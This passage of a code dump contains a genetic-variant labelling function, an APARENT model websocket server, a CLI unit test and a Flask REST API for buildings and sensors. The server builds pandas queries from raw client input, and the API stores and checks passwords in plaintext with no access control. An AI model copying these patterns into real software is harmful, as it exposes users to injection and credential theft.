seq_df_delta.loc['ACTTGATTGTACAAAATACGTTTTGTAAATGTTGTGCTGTTAACACTGCAAATAATCTTGGTAGCAAACACTTCCACCATGAATGACTGTTCTTGAGACTTAGGCCAGCCGACTTTCTCAGAGCCTTTTCACTGTGCTTCAGTCTCCCACTCTGTAAAATGGGG', 'significance'] = 'Undetermined'
seq_df_delta.loc['ACTTGATTGTACAAAATACGTTTTGTAAATGTTGTGCTGTTAACACTGCAAATAATCTTGGTAGCAAACACTTCCACCATGAATGACTGTTCTTGAGACTTAGGCCAGCCGACTTTCTCAGAGCCTTTTCACTGTGCTTCAGTCTCCCACTCTGTAAAATGGGG', 'clinvar_id'] = 'c.*1363A>T'
#RNU4ATAC.4
seq_df_delta.loc[seq_df_delta.gene == 'RNU4ATAC.4', 'significance'] = 'Pathogenic other'
#HBB.1
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACGTTTATTTTCATTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACGTTTATTTTCATTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*118A>G'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCACTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCACTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*129T>C'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGAAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGAAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*132C>A'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGTAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Undetermined'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGTAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*132C>T'
#ARSA.3
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACTAGTGGAGACTTGCAGATGTGACAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACTAGTGGAGACTTGCAGATGTGACAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*103C>T'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGAGAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGAGAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*125C>G'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGACAATTAGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGACAATTAGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*130C>A'
return seq_df_delta.reset_index().copy()
```
#### File: web/old_version/aparent_server_websocket.py
```python
from __future__ import print_function
import keras
from keras.models import Sequential, Model, load_model
from keras import backend as K
import tensorflow as tf
import pandas as pd
import os
import sys
import time
import pickle
import numpy as np
import scipy.sparse as sp
import scipy.io as spio
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import isolearn_keras as iso
from aparent_losses import *
from aparent_visualization import *
import websockets
import asyncio
import signal
import logging
logging.getLogger('tensorflow').setLevel(logging.ERROR)
import json
#Load APADB pair data
'''apadb_pair_dict = pickle.load(open('apa_apadb_data.pickle', 'rb'))
apadb_pair_df = apadb_pair_dict['apadb_df']
#Take only pooled datapoints
apadb_pair_df = apadb_pair_df.query("tissue == 'pooled'").copy()
apadb_pair_df['seq_prox'] = apadb_pair_df['wide_seq_ext_prox'].str.slice(175-70, 175-70+205)
apadb_pair_df['seq_dist'] = apadb_pair_df['wide_seq_ext_dist'].str.slice(175-70, 175-70+205)
apadb_pair_df['rel_start_prox'] = apadb_pair_df['rel_start_prox'] #- 105
apadb_pair_df['rel_end_prox'] = apadb_pair_df['rel_end_prox'] + 1#- 105
apadb_pair_df['rel_start_dist'] = apadb_pair_df['rel_start_dist'] #- 105
apadb_pair_df['rel_end_dist'] = apadb_pair_df['rel_end_dist'] + 1#- 105
apadb_pair_df['site_distance'] = np.abs(apadb_pair_df['cut_start_prox'] - apadb_pair_df['cut_start_dist'])
gene_list = sorted(list(apadb_pair_df["gene"].unique()))
gene_id_list = sorted(list(apadb_pair_df["gene_id"].unique()))'''
#Load APADB data
apadb_df = pd.read_csv('leslie_apadb_data_wider_v2.csv', sep=',')
apadb_df['seq'] = apadb_df['wide_seq_ext'].str.slice(175-70, 175-70+205)
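# The two helpers below convert genomic cut-window coordinates (cut_start/cut_end,
# relative to pas_pos) into positions within the extracted 205-nt sequence,
# accounting for strand orientation.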
def get_start_pos(row) :
if row['strand'] == '+' :
return row['cut_start'] - row['pas_pos'] + 70
else :
return row['pas_pos'] - row['cut_end'] + 76
def get_end_pos(row) :
if row['strand'] == '+' :
return row['cut_end'] - row['pas_pos'] + 70 + 1
else :
return row['pas_pos'] - row['cut_start'] + 76 + 1
apadb_df['rel_start'] = apadb_df.apply(get_start_pos, axis=1)
apadb_df['rel_end'] = apadb_df.apply(get_end_pos, axis=1)
gene_list = sorted(list(apadb_df["gene"].unique()))
gene_id_list = sorted(list(apadb_df["gene_id"].unique()))
#Construct pair-wise APADB data
apadb_df['gene_id_dist'] = apadb_df['gene_id'].apply(lambda x: '.'.join(x.split('.')[:-1]) + '.' + str(int(x.split('.')[-1]) - 1))
df_dist = apadb_df.copy().set_index('gene_id')
dist_columns = [
'sitenum',
'pas',
'seq',
'wide_seq',
'wide_seq_ext',
'site_type',
'pas_pos',
'cut_start',
'cut_end',
'cut_mode',
'mirna',
'count',
'rel_start',
'rel_end'
]
df_dist = df_dist[dist_columns]
apadb_pair_df = apadb_df.join(df_dist, on='gene_id_dist', how='inner', lsuffix='_prox', rsuffix='_dist')
apadb_pair_df['site_distance'] = np.abs(apadb_pair_df['cut_start_prox'] - apadb_pair_df['cut_start_dist'])
pair_gene_list = sorted(list(apadb_pair_df["gene"].unique()))
#Load base APARENT model
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'aparent_plasmid_iso_cut_distalpas_large_lessdropout_all_libs_no_sampleweights.h5'
model_path = os.path.join(save_dir, model_name)
aparent_model = load_model(model_path)
#Load APADB-tuned APARENT model
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'aparent_apadb_fitted.h5'
model_path = os.path.join(save_dir, model_name)
apadb_model = load_model(model_path)
#Dummy compile
#opt = keras.optimizers.SGD(lr=0.1)
#model.compile(loss='mean_squared_error', optimizer=opt)
encoder = iso.OneHotEncoder(205)
def aparent_mutmap(seq, iso_start, iso_end) :
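    # In-silico saturation mutagenesis: predicts the cut distribution for the reference
    # sequence and for every possible single-nucleotide substitution, returning an
    # (L x 4 x L+1) array of variant cut predictions.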
cut_ref, _, _ = aparent_predict(seq, iso_start, iso_end)
cut_vars = np.zeros((len(seq), 4, len(seq) + 1))
for mut_pos in range(len(seq)) :
for mut_nt_i, mut_nt in enumerate(['A', 'C', 'G', 'T']) :
var_seq = seq[:mut_pos] + mut_nt + seq[mut_pos+1:]
cut_pred, _, _ = aparent_predict(var_seq, iso_start, iso_end)
cut_vars[mut_pos, mut_nt_i, :] = cut_pred[:]
return cut_ref, cut_vars
def aparent_predict(seq, iso_start, iso_end) :
#Predict iso and cut
one_hot = np.reshape(encoder(seq), (1, 205, 4, 1))
_, cut_pred = aparent_model.predict(x=[one_hot, np.zeros((1, 13)), np.ones((1, 1))])
cut_pred = np.ravel(cut_pred)
iso_pred = np.sum(cut_pred[iso_start: iso_end])
logodds_pred = np.log(iso_pred / (1.0 - iso_pred))
return cut_pred, iso_pred, logodds_pred
def apadb_predict(seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance) :
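    # Predicts proximal-vs-distal isoform usage for a pair of polyA sites with the
    # APADB-tuned model; the site distance is passed in log-space (see below).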
site_distance = np.log(np.array([site_distance]).reshape(1, -1)) #Site distance in log-space
prox_cut_start = np.array([prox_cut_start]).reshape(1, -1)
prox_cut_end = np.array([prox_cut_end]).reshape(1, -1)
dist_cut_start = np.array([dist_cut_start]).reshape(1, -1)
dist_cut_end = np.array([dist_cut_end]).reshape(1, -1)
onehot_prox = np.reshape(encoder(seq_prox), (1, len(seq_prox), 4, 1))
onehot_dist = np.reshape(encoder(seq_dist), (1, len(seq_dist), 4, 1))
#Predict with APADB-tuned APARENT model
iso_pred, cut_prox, cut_dist = apadb_model.predict(x=[onehot_prox, onehot_dist, prox_cut_start, prox_cut_end, dist_cut_start, dist_cut_end, site_distance, np.zeros((1, 13)), np.ones((1, 1))])
return iso_pred[0, 0], np.ravel(cut_prox), np.ravel(cut_dist)
async def hello(websocket, path):
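    # Simple text protocol: each request is an underscore-delimited command, e.g.
    # "aparent_<seq>_<cut_start>_<cut_end>" or "getseq_<gene_id>" (see the parsing
    # below); responses are sent back as JSON. Because "_" is the delimiter, the
    # payload fields themselves must not contain underscores.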
message = ''
while message != 'exit' :
message = await websocket.recv()
print(f"< {message}")
return_json = ''
if 'aparent_' in message :
_, seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_pred, _, _ = aparent_predict(seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "aparent",
#"cut_pred": str(["{:.6f}".format(cut) for cut in cut_pred.tolist()])
"cut_pred": [round(cut, 6) for cut in cut_pred.tolist()]
}
)
elif 'variant_' in message :
_, ref_seq, var_seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_ref, _, _ = aparent_predict(ref_seq, cut_start, cut_end)
cut_var, _, _ = aparent_predict(var_seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "variant",
"cut_ref": [round(cut, 6) for cut in cut_ref.tolist()],
"cut_var": [round(cut, 6) for cut in cut_var.tolist()]
}
)
elif 'mutmap_' in message :
_, ref_seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_ref, cut_vars = aparent_mutmap(ref_seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "mutmap",
"cut_ref": [round(cut, 6) for cut in cut_ref.tolist()],
"cut_vars": np.round(cut_vars, 6).tolist()
}
)
elif 'apadb_' in message :
_, seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance = message.split("_")
prox_cut_start, prox_cut_end, dist_cut_start, dist_cut_end, site_distance = int(prox_cut_start), int(prox_cut_end), int(dist_cut_start), int(dist_cut_end), int(site_distance)
iso_pred, cut_prox, cut_dist = apadb_predict(seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance)
return_json = json.dumps(
{
"return_action" : "apadb",
"iso" : str(round(iso_pred, 6)),
"cut_prox" : [round(cut, 6) for cut in cut_prox.tolist()],
"cut_dist" : [round(cut, 6) for cut in cut_dist.tolist()]
}
)
elif 'getsites_' in message :
_, gene = message.split("_")
gene_df = apadb_pair_df.query("gene == '" + gene + "'")
return_json = json.dumps(
{
"return_action" : "getsites",
"gene" : [str(row["gene"]) for _, row in gene_df.iterrows()],
"gene_id" : [str(row["gene_id"]) for _, row in gene_df.iterrows()],
"sitenum_prox" : [str(row["sitenum_prox"]) for _, row in gene_df.iterrows()],
"sitenum_dist" : [str(row["sitenum_dist"]) for _, row in gene_df.iterrows()],
"site_type_prox" : [str(row["site_type_prox"]) for _, row in gene_df.iterrows()],
"site_type_dist" : [str(row["site_type_dist"]) for _, row in gene_df.iterrows()]
}
)
elif 'getseqs_' in message :
_, gene_id = message.split("_")
gene_df = apadb_pair_df.query("gene_id == '" + gene_id + "'")
return_json = json.dumps(
{
"return_action" : "getseqs",
"gene" : str(gene_df["gene"].values[0]),
"gene_id" : str(gene_df["gene_id"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"sitenum_prox" : str(gene_df["sitenum_prox"].values[0]),
"sitenum_dist" : str(gene_df["sitenum_dist"].values[0]),
"site_type_prox" : str(gene_df["site_type_prox"].values[0]),
"site_type_dist" : str(gene_df["site_type_dist"].values[0]),
"seq_prox" : str(gene_df["seq_prox"].values[0]),
"seq_dist" : str(gene_df["seq_dist"].values[0]),
"site_distance" : str(gene_df["site_distance"].values[0]),
"cut_start_prox" : str(gene_df["rel_start_prox"].values[0]),
"cut_end_prox" : str(gene_df["rel_end_prox"].values[0]),
"cut_start_dist" : str(gene_df["rel_start_dist"].values[0]),
"cut_end_dist" : str(gene_df["rel_end_dist"].values[0]),
"cut_start_coord_prox" : str(gene_df["cut_start_prox"].values[0]),
"cut_end_coord_prox" : str(gene_df["cut_end_prox"].values[0]),
"cut_start_coord_dist" : str(gene_df["cut_start_dist"].values[0]),
"cut_end_coord_dist" : str(gene_df["cut_end_dist"].values[0])
}
)
elif 'getevents_' in message :
_, gene = message.split("_")
gene_df = apadb_df.query("gene == '" + gene + "'")
return_json = json.dumps(
{
"return_action" : "getevents",
"gene" : [str(row["gene"]) for _, row in gene_df.iterrows()],
"gene_id" : [str(row["gene_id"]) for _, row in gene_df.iterrows()],
"sitenum" : [str(row["sitenum"]) for _, row in gene_df.iterrows()],
"site_type" : [str(row["site_type"]) for _, row in gene_df.iterrows()]
}
)
elif 'getseq_' in message :
_, gene_id = message.split("_")
gene_df = apadb_df.query("gene_id == '" + gene_id + "'")
return_json = json.dumps(
{
"return_action" : "getseq",
"gene" : str(gene_df["gene"].values[0]),
"gene_id" : str(gene_df["gene_id"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"sitenum" : str(gene_df["sitenum"].values[0]),
"site_type" : str(gene_df["site_type"].values[0]),
"seq" : str(gene_df["seq"].values[0]),
"cut_start" : str(gene_df["rel_start"].values[0]),
"cut_end" : str(gene_df["rel_end"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"cut_start_coord" : str(gene_df["cut_start"].values[0]),
"cut_end_coord" : str(gene_df["cut_end"].values[0])
}
)
elif 'getgenes' == message :
return_json = json.dumps(
{
"return_action" : "getgenes",
"genes" : gene_list
}
)
elif 'getpairgenes' == message :
return_json = json.dumps(
{
"return_action" : "getgenes",
"genes" : pair_gene_list
}
)
await websocket.send(return_json)
print(f"> {return_json}")
loop = asyncio.get_event_loop()
# Create the server.
start_server = websockets.serve(hello, 'localhost', 9990)
server = loop.run_until_complete(start_server)
# Run the server until receiving SIGTERM.
stop = asyncio.Future()
loop.add_signal_handler(signal.SIGTERM, stop.set_result, None)
loop.run_until_complete(stop)
# Shut down the server.
server.close()
loop.run_until_complete(server.wait_closed())
``` |
{
"source": "8790/terminal_printer",
"score": 3
} |
#### File: printer/test/command_test.py
```python
from __future__ import print_function, absolute_import
import shlex
import random
import string
import unittest
from printer.run import *
from printer.painter import MESS_FILTERS, FONT_LIST
class CommandTester(unittest.TestCase):
def setUp(self):
_, self.parser = parser()
@staticmethod
def gen_rand(length):
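        # Build a random string of letters, digits and spaces with the given length.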
return "".join(random.choice(string.digits + string.ascii_letters + ' ') for _ in range(length))
def test_init(self):
self.assertTrue(self.parser.parse_args(['-i']).init)
self.assertTrue(self.parser.parse_args(['--init']).init)
def test_text(self):
name = self.gen_rand(20)
self.assertEqual(name, self.parser.parse_args(shlex.split("--text '{}'".format(name))).text)
self.assertEqual(name, self.parser.parse_args(shlex.split("-t '{}'".format(name))).text)
self.assertEqual('HellFlame', self.parser.parse_args().text)
def test_color(self):
color = random.randrange(30, 50)
self.assertEqual(color, self.parser.parse_args(shlex.split("--color {}".format(color))).color)
self.assertEqual(color, self.parser.parse_args(shlex.split("-c {}".format(color))).color)
def test_filter(self):
f = random.randrange(1, len(MESS_FILTERS))
self.assertEqual(f, self.parser.parse_args(shlex.split("--filter {}".format(f))).filter)
self.assertEqual(f, self.parser.parse_args(shlex.split("-f {}".format(f))).filter)
self.assertEqual(73, self.parser.parse_args().filter)
def test_width_height(self):
w, h = random.randrange(1, 100), random.randrange(1, 100)
parse = self.parser.parse_args(shlex.split("--width {} --height {}".format(w, h)))
self.assertEqual(w, parse.width)
self.assertEqual(h, parse.height)
def test_gray(self):
self.assertTrue(self.parser.parse_args(['--gray']).gray)
self.assertTrue(self.parser.parse_args(['-g']).gray)
def test_keep_ratio(self):
self.assertTrue(self.parser.parse_args(['--keep-ratio']).keep_ratio)
self.assertTrue(self.parser.parse_args(['-kr']).keep_ratio)
def test_font(self):
f = random.randrange(0, len(FONT_LIST) - 1)
self.assertEqual(f, self.parser.parse_args(shlex.split('--font {}'.format(f))).font)
self.assertEqual(f, self.parser.parse_args(shlex.split('-F {}'.format(f))).font)
def test_reverse(self):
self.assertTrue(self.parser.parse_args(['-r']).reverse)
self.assertTrue(self.parser.parse_args(['--reverse']).reverse)
if __name__ == '__main__':
unittest.main(verbosity=2)
``` |
{
"source": "87boy/sisu",
"score": 3
} |
#### File: sisu/examples/my_sqlalchemy.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
# def __repr__(self):
# return '<User %r>' % self.username
# from my_sqlalchemy import db
# db.create_all()
# from my_sqlalchemy import User
# admin = User('admin', '<EMAIL>')
# guest = User('guest', '<EMAIL>')
# db.session.add(admin)
# db.session.add(guest)
# db.session.commit()
# users = User.query.all()
# print users
# print type(users)
# import json
# print json.dumps(users)
```
#### File: restful_api/restful_api/api.py
```python
from flask import Flask, request, jsonify
from flask.ext.restful import abort, Api, Resource, reqparse
from flask.ext.sqlalchemy import SQLAlchemy
# from config import *
from model import *
api = Api(app)
# stdlib
# from json import dumps
def to_json(model):
""" Returns a JSON representation of an SQLAlchemy-backed object. """
json = {}
# json['fields'] = {}
# json['pk'] = getattr(model, 'id')
for col in model._sa_class_manager.mapper.mapped_table.columns:
# json['fields'][col.name] = getattr(model, col.name)
json[col.name] = getattr(model, col.name)
# return dumps([json])
return json
def to_json_list(model_list):
json_list = []
for model in model_list:
json_list.append(to_json(model))
return json_list
class UserResource(Resource):
def get(self, user_id):
record = User.query.filter_by(id=user_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, user_id):
parser = reqparse.RequestParser()
parser.add_argument('password', type=str)
args = parser.parse_args(strict=True)
record = User.query.filter_by(id=user_id).first()
if record:
record.password = args['password']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'user not exist'}, 404
def delete(self, user_id):
record = User.query.filter_by(id=user_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class UserList(Resource):
def get(self):
record_list = User.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(record_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('username', type=str)
parser.add_argument('password', type=str)
parser.add_argument('email', type=str)
args = parser.parse_args(strict=True)
new_record = User(args['username'], args['password'], args['email'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class Login(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('username', type=str)
parser.add_argument('password', type=str)
args = parser.parse_args()
user = User.query.filter_by(username=args['username']).first()
if user and (args['password'] == user.password):
            return {'status': 'login succeeded'}, 200
else:
return {'status': 'login failed'}, 200
class BuildingResource(Resource):
def get(self, building_id):
record = Building.query.filter_by(id=building_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, building_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args(strict=True)
record = Building.query.filter_by(id=building_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'building not exist!'}, 404
def delete(self, building_id):
record = Building.query.filter_by(id=building_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class BuildingList(Resource):
def get(self):
building_list = Building.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(building_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
parser.add_argument('latitude', type=str)
parser.add_argument('longitude', type=str)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Building(args['name'], args['latitude'], args['longitude'], args['description'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class FloorResource(Resource):
def get(self, floor_id):
record = Floor.query.filter_by(id=floor_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, floor_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args()
record = Floor.query.filter_by(id=floor_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'floor not exist'}, 404
def delete(self, floor_id):
record = Floor.query.filter_by(id=floor_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class FloorList(Resource):
def get(self):
floor_list = Floor.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('building_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Floor(args['building_id'], args['name'], args['description'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class RoomResource(Resource):
def get(self, room_id):
record = Room.query.filter_by(id=room_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, room_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=str)
args = parser.parse_args()
record = Room.query.filter_by(id=room_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
            return {'status': 'room not exist'}, 404
def delete(self, room_id):
record = Room.query.filter_by(id=room_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class RoomList(Resource):
def get(self):
floor_list = Room.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('floor_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Room(
args['floor_id'], args['name'], args['description'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
class DeviceResource(Resource):
def get(self, device_id):
record = Device.query.filter_by(id=device_id).first()
if record is not None:
return to_json(record), 200
else:
            return {'status': 'device not exist'}
def put(self, device_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args()
record = Device.query.filter_by(id=device_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'device not exist!'}, 404
def delete(self, device_id):
record = Device.query.filter_by(id=device_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class DeviceList(Resource):
def get(self):
floor_list = Device.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('room_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
parser.add_argument('uuid', type=str)
args = parser.parse_args(strict=True)
new_record = Device(
args['room_id'], args['name'],
args['uuid'], args['description'])
db.session.add(new_record)
result = db.session.commit()
return new_record.id, 201
class sensorResource(Resource):
def get(self, sensor_id):
record = Sensor.query.filter_by(id=sensor_id).first()
if record is not None:
return to_json(record), 200
else:
return {"status": "sensor not exit"}
def put(self, sensor_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=str)
args = parser.parse_args()
record = Sensor.query.filter_by(id=sensor_id).first()
if record:
record.name = args['name']
db.session.commit()
return to_json(record), 201
else:
return {"status": "sensor not exit"}
def delete(self, sensor_id):
record = Sensor.query.filter_by(id=sensor_id).first()
if record is not None:
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
else:
return {"status": "sensor not exit"}
class sensorList(Resource):
def get(self):
floor_list = Sensor.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('type', type=str, location='json')
parser.add_argument('name', type=unicode, location='json')
parser.add_argument('uuid', type=str, location='json')
parser.add_argument('description', type=unicode, location='json')
args = parser.parse_args(strict=True)
new_record = Sensor(
args['type'], args['name'], args['uuid'], args['description'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
class DataResource(Resource):
def get(self, data_id):
record = SensorData.query.filter_by(id=data_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, data_id):
parser = reqparse.RequestParser()
parser.add_argument('value', type=str)
args = parser.parse_args()
record = SensorData.query.filter_by(id=data_id).first()
if record:
record.value = args['value']
db.session.commit()
return {"status": "updated"}, 201
else:
return {"status": "data not exit"}
def delete(self, data_id):
record = SensorData.query.filter_by(id=data_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class dList(Resource):
def get(self):
floor_list = SensorData.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('device_id', type=int)
parser.add_argument('sensor_id', type=int)
parser.add_argument('value', type=unicode)
parser.add_argument('datetime', type=str)
parser.add_argument('status', type=int)
args = parser.parse_args(strict=True)
new_record = SensorData(
args['device_id'], args['sensor_id'], args['value'],
args['datetime'], args['status'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
# add a new device
class locationList(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('uuid', type=str)
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
parser.add_argument('device_name', type=str)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
print args['room_name']
print floorInfor.id
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
new_record = Device(
roomInfor.id, args['device_name'],
args['uuid'], args['description'])
db.session.add(new_record)
db.session.commit()
return {"status": "insert successful"}, 201
else:
return {"error": "floor not exit"}
else:
return {"error": "building not exit"}
# lookup, update, delete a device
class locationResource(Resource):
